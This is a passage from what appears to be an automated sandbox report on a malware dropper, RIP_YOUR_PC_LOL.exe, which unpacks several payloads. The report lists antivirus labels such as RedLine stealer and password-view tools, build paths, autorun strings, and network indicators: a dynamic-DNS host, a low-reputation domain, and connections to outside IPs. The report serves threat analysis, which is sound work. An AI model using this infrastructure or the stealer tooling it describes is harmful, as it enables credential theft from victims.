                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.8.unpackAvira: Label: TR/Dropper.Gen
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.10.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 17.2.mediaget.exe.ab0000.0.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.7.unpackAvira: Label: TR/Dropper.Gen
                    Source: 9.0.Opus.exe.840000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 8.0.gay.exe.d0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 8.0.gay.exe.d0000.0.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 11.0.22.exe.457136.3.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 4.2.healastounding.exe.4582ffa.11.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.e387f7.8.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.dda1e2.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 12.0.aaa.exe.2c0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.56d4258.19.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 17.0.mediaget.exe.ab0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.d587a1.5.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                    Source: 4.0.healastounding.exe.900000.12.unpackAvira: Label: TR/AD.RedLineSteal.cjshc
                    Source: 4.0.healastounding.exe.900000.12.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5956fd2.3.unpackAvira: Label: TR/Dropper.Gen
                    Source: 6.0.test.exe.da0000.2.unpackAvira: Label: TR/Dropper.Gen
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.d587a1.6.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 6.0.test.exe.da0000.3.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.5821276.21.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.e387f7.7.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.aaa.exe.2c0000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.11.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.ea57bf.8.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 4.2.healastounding.exe.44c50a8.8.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.57b42ae.20.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 17.0.mediaget.exe.ab0000.2.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 9.0.Opus.exe.840000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 8.0.gay.exe.d0000.3.unpackAvira: Label: TR/ATRAPS.Gen
                    Source: 4.0.healastounding.exe.900000.8.unpackAvira: Label: TR/AD.RedLineSteal.cjshc
                    Source: 4.0.healastounding.exe.900000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                    Source: 6.0.test.exe.da0000.1.unpackAvira: Label: TR/Dropper.Gen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, 4.exe, 00000010.00000000.446983407.0000000001203000.00000002.00000001.01000000.0000000E.sdmp, 4.exe, 00000010.00000002.519990989.0000000001203000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\buildbot\slave1\desktop_screen\build\bin\active_desktop_launcher.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: ]C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Pluto Panel.exe, 00000005.00000002.710948269.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.706244077.0000000003705000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                    Source: healastounding.exeBinary or memory string: autorun.inf
                    Source: healastounding.exeBinary or memory string: [autorun]
                    Source: healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: autorun.inf
                    Source: healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
                    Source: healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                    Source: healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                    Source: Pluto Panel.exeBinary or memory string: [autorun]
                    Source: Pluto Panel.exeBinary or memory string: autorun.inf
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: autorun.inf
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: [autorun]
                    Source: gay.exeBinary or memory string: autorun.inf
                    Source: gay.exeBinary or memory string: [autorun]
                    Source: gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: autorun.inf
                    Source: gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: [autorun]
                    Source: gay.exe, 00000008.00000002.451519757.0000000002744000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                    Source: gay.exe, 00000008.00000002.451519757.0000000002744000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                    Source: mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: autorun.inf
                    Source: mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: [autorun]
                    Source: mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                    Source: mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                    Source: mediaget.exe, 00000011.00000002.704209643.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                    Source: mediaget.exe, 00000011.00000002.704209643.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03200728
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03206711
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then call 03201B20h5_2_03208714
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03208714
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03205B71
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then jmp 03201A73h5_2_032019A0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then jmp 03201A73h5_2_032019B0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03209596
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_032017F8
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then call 03201B20h5_2_032087FE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_032087FE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then call 03201B20h5_2_03207FCA
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03207FCA
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then mov esp, ebp5_2_0320482F
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03206038
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03208E09
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_032076A8
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_032094AC
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_03207698
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_032014C0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03208AC3
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]5_2_03205CCE

                    Networking

                    barindex
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: yabynennet.xyz
                    May check the online IP address of the machine
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: gfhhjgh.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.6:49768 -> 179.13.1.253:8050
                    Source: global trafficTCP traffic: 192.168.2.6:49774 -> 41.249.51.34:1470
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: Pluto Panel.exe, 00000005.00000002.712709095.0000000008430000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ocsp.thawte.com0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s2.symcb.com0
                    Source: healastounding.exeString found in binary or memory: http://schemas.microsof
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://sv.symcd.com0&
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
